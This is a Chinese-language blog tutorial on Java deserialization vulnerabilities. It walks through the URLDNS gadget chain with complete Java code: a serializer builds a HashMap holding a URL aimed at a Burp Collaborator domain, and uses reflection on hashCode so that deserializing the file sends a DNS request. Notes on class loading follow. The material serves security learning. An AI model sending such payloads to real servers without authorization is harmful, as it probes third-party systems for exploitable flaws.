【Java反序列化】URLDNS

已于 2022-04-21 21:29:17 修改
阅读量2.4k 收藏
点赞数
分类专栏: Java反序列化 文章标签: 网络安全
于 2022-04-14 22:29:54 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_61572518/article/details/124183665
版权

一、反序列化入门基础

writeObject:序列化

readObject:反序列化

有的类因为自身需要,会重写序列化与反序列化方法。

反序列化产生安全的原因:

服务端反序列化数据时,会自动执行客户端传递过来的类中的readObject方法,这样就会在服务器上执行代码。

可能存在反序列化的地方:

1.入口类的readObject直接调用危险方法。(不太可能)

2.入口类参数中包含可控类,该类有危险方法,readObject()时调用。(比如下面举的URLDNS链)

3.入口类参数中包含可控类,该类有调用其它有危险方法的类,readObject时调用。

Java反射机制在反序列化漏洞中的应用:

1.定制需要的对象;

2.通过invoke调用出了同名函数以外的函数;

3.通过Class类创建对象,引入不能序列化的类。(比如Runtime)

下面是一个URLDNS链的代码,详细的解析见文章:

Java安全学习—URLDNS链 - FreeBuf网络安全行业门户

序列化代码:

import java.io.FileOutputStream;
import java.io.IOException;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;
import java.net.URL;
import java.util.HashMap;

public class UrlDnsClient {
    public static void main(String[] args) throws ClassNotFoundException, IOException, NoSuchFieldException, IllegalAccessException {
        HashMap<URL, String> map = new HashMap<>();
        URL url = new URL("http://cdtq2a2rtph2aed620pb8nzmido8cx.burpcollaborator.net");
        Class<?> clazz = Class.forName("java.net.URL");
        // 获取URL类的hashCode属性,该值默认为-1
        Field field = clazz.getDeclaredField("hashCode");
        field.setAccessible(true);
        // 将hashCode的值设为-1之外的值,因为URL类中的hashCode()方法在hashCode为-1之外的值时,会直接返回hashCode,如果为-1,才会执行handler.hashCode(this)方法,发起后续的DNS解析请求
        field.set(url, 123);
        map.put(url, "2333");
        // 将url对象放入map中后,需要讲属性重新设置为-1,这样在反序列的时候,才会执行handler.hashCode(this)方法
        field.set(url, -1);
        FileOutputStream fileOutputStream = new FileOutputStream("demo.bin");
        ObjectOutputStream objectOutputStream = new ObjectOutputStream(fileOutputStream);
        objectOutputStream.writeObject(map);
        fileOutputStream.close();
        objectOutputStream.close();
    }
}

反序列化代码:

import java.io.FileInputStream;
import java.io.IOException;
import java.io.ObjectInputStream;

public class UrlDnsServer {
    public static void main(String[] args) throws IOException, ClassNotFoundException {
        FileInputStream inputStream = new FileInputStream("demo.bin");
        ObjectInputStream objectInputStream = new ObjectInputStream(inputStream);
        objectInputStream.readObject();
        objectInputStream.close();
        inputStream.close();
    }
}

20220421更新

类加载机制

1.类加载机制与反序列化

类加载的时候会执行代码

初始化:静态代码块

实例化:构造代码块、无参构造函数

2.动态类加载方法

Class.forname

初始化/不初始化

ClassLoader.loadClass不进行初始化

底层的原理,实现加载任意的类

ClassLoader->SecureClassLoader->URLClassLoader->AppClassLoader

loadClass->findClass(重写的方法)->defineClass(从字节码加载类)

URLClassLoader 任意类加载:file/http/jar

ClassLoader.defineClass 字节码加载任意类 私有

Unsafe.defineClass 字节码加载 public类不能直接生成

xbpan_sec
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Java反序列化入门之URLDNS链1
08-03
1、 java.util.HashMap 重写了 readObject 方法: 2、 java.net.URL 对象的 hashCode 在计算时会调用 get
java反序列化-URLDNS
GalaxySpaceX的博客
02-23 221
java反序列化-URLDNS分析
Java反序列化URLDNS
m0_62466350的博客
05-28 713
URLDNS链是java原生态的一条利用链,通常用于存在反序列化漏洞进行验证的,因为是原生态,不存在什么版本限制。不限制jdk版本,使用Java内置类,对第三方依赖没有要求目标无回显,可以通过DNS请求来验证是否存在反序列化漏洞URLDNS利用链,只能发起DNS请求,并不能进行其他利用这条链路还是比较简单的,通常用于存在反序列化漏洞进行验证的,学好了才能更好的为后面打基础。
URLDNS反序列化
遇事不决冲冲冲
01-28 3992
URLDNS URLDNS算是一条比较简单的利用链,这条链不依赖第三方库,它无法执行系统命令,成功利用的结果也只是实现服务器的一次url解析,主要用这条链来判断服务器是否存在反序列化。接下来就这条链的原理和poc进行分析。 原理分析 首先了解这一下这条链是怎样执行的,代码中最重要的三个类是HashMap,URL,URLStreamHandler。其中HashMap重写了readObject方法,URL类是里面有个hashCode()方法被HashMap的readObject()调用了,URLStreamHa
js中URL查询字符串(query string)的序列与反序列化
忧郁的蛋的专栏
07-09 907
如果需要更高级的处理方式,可以使用其它库或第三方函数库,比如 qs, querystring 等库来处理。这些方法都能达到相同的目的,你可以根据项目中使用的JavaScript环境和需要的复杂度来进行选择。当然,如果需要手动处理查询字符串,也可以使用 JavaScript 的标准字符串处理函数来实现。对于反序列化的操作可以使用URL的search属性,来解析query string。来编码和解码查询字符串中的字符,以防止出现无效或不安全的字符。这些方法都能给出更灵活的操作,请根据具体需求来选择使用。
Java代码审计13之URLDNS
划水的小白白
08-22 402
1、简介urldns链 2、hashmap与url类的分析 2.1、Hashmap类readObject方法的跟进 2.2、URL类hashcode方法的跟进 2.3、InetAddress类的getByName方法 3、整个链路的分析 3.1、整理上述的思路 3.2、一些疑问的测试 3.3、hashmap的put方法分析 3.4、反射 3.5、整个代码 4、补充说明
109-Java反序列化之ysoserial URLDNS模块分析.pdf
09-20
109-Java反序列化之ysoserial URLDNS模块分析.pdf
S02-URLDNS反序列化构造链1
08-03
1. 首先使用 ysoserial 生成反序列化文件,然后自行编写反序列流程,触发构造链 3. 触发请求: 4. 然后查看urldns中gadget的生成过程:
ShiroScan:Shiro RememberMe 1.2.4反序列化入侵图形化检测工具(Shiro-550)
03-18
有三种方式进行检测,第一种是利用URLDNS进行检测,第二种利用命令执行进行检测,第三种使用SimplePrincipalCollection序列化后进行检测(XCheck ,即X光检查)。 功能简介 默认DNSLOG 选择后会调用dnslog.cn的接口...
shiro-check:Shiro反序列化回显利用,内存外壳,检查Burp插件
03-21
四郎检查3.0增加了一些回显有效载荷,增加了基于过滤... 2.0增加了回显,及100个键,20个键的扫描选项,利用了burp内置的dnslog api(协作者)基于ysoserial的小工具URLDNS进行DNS查询验证此漏洞! #release中提供下载
Node.js-url如何反序列化,对象序列化,如何对url中的路径进行解析
weixin_44486539的博客
07-19 660
url 中的路径进行解析 querystring.parse(str[, sep[, eq[, options]]]) 将 url 查询字符串反序列化为对象(url中 “?” 之后的内容)。 str 需要解析的 url 查询字符串;sep 分割键值对的字符串,默认为 “&”;eq 分割键和值的字符串,默认为 “=”。 // 引入 querystring 模块,用于解析...
url参数序列化与反序列化
你,若盛开的专栏
06-22 1309
1、安装包 npm install qs 2、导入 import { parse, stringify } from "qs" 3、使用 // 反序列化 let urlParams= "name=Tom&id=2022"; let obj = parse(urlParams) // { name: 'Tom', id: 2022 } // 序列化 let str = qs.stringify(obj); console.log(str); // name=Tom&id=2022
[JAVA反序列化] URLDNS
snowlyzz的博客
11-08 810
[Java反序列化]—URLDNS链 分析
java反序列化rce rmi jrmp jndi 原理
whatday的专栏
12-27 870
RMI攻击主要分3种目标:RMI Client、RMI Server、RMI Registry。使用远程Reference字节码进行攻击。从jdk8u121开始,RMI加入了反序列化白名单机制,JRMP的payload登上舞台,这里的payload指的是ysoserial修改后的JRMPClient。从jdk8u121开始,RMI远程Reference代码默认不信任,RMI远程Reference代码攻击方式开始失效。
01-JAVA反序列化-入门
Curry_live的博客
09-02 1277
JAVA反序列化漏洞原理与利用链构造基础知识
java-URLDNS链分析
qq_62613905的博客
01-29 330
URLDNS链分析
反序列化URLDNS
BaiScorpio的博客
06-13 413
通过 URLDNS学习Java反序列化相关的知识。
java url dns_Java反序列化URLDNS链分析
weixin_42504279的博客
02-24 756
预备知识Java反序列化会调用对应的readobject方法比如我创建一个类test。序列化test类就会调用writeobject方法,反序列化就会调用test类的readobject方法。默认是存在的。可以重写readobject方法链子分析在HashMap中。存在readobject方法。最后会调用hash(key)然后hash(key)又会调用key.hashCode方法而URL类又存在一...
Java代码审计:Java反序列化入门之URLDNS
god_Zeo的安全博客
08-19 1220
0x00 前言 自学Java 代码审计,主要自己一个人学习,有点闭门造车,搜索引擎学习法,但是还是记录一下,也分享一下,也便于将来的总结和反思,如果我能终能学到什么,我也会重新梳理思路,为那些自学者提供一个好的思路,所以有了下面的系列文章java代码审计自学篇。 之前研究了,但是没有整理好,因为有hvv任务,所以推迟了一些,现在赶紧整理发出来。 0x01 Java反序列化介绍 Java反序列化漏洞的产生原因: 简单的说就是,在于开发者在重写 readObject 方法的时候,写入了漏洞代码。 序列化和反序列
java反序列化攻击
最新发布
10-05
Java反序列化攻击是一种安全漏洞,攻击者可以通过操纵反序列化过程中的输入数据,来执行未授权的操作。攻击者可以通过修改被序列化的对象的内容,或者创建恶意的序列化数据,来导致代码执行、远程命令执行、上传恶意...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值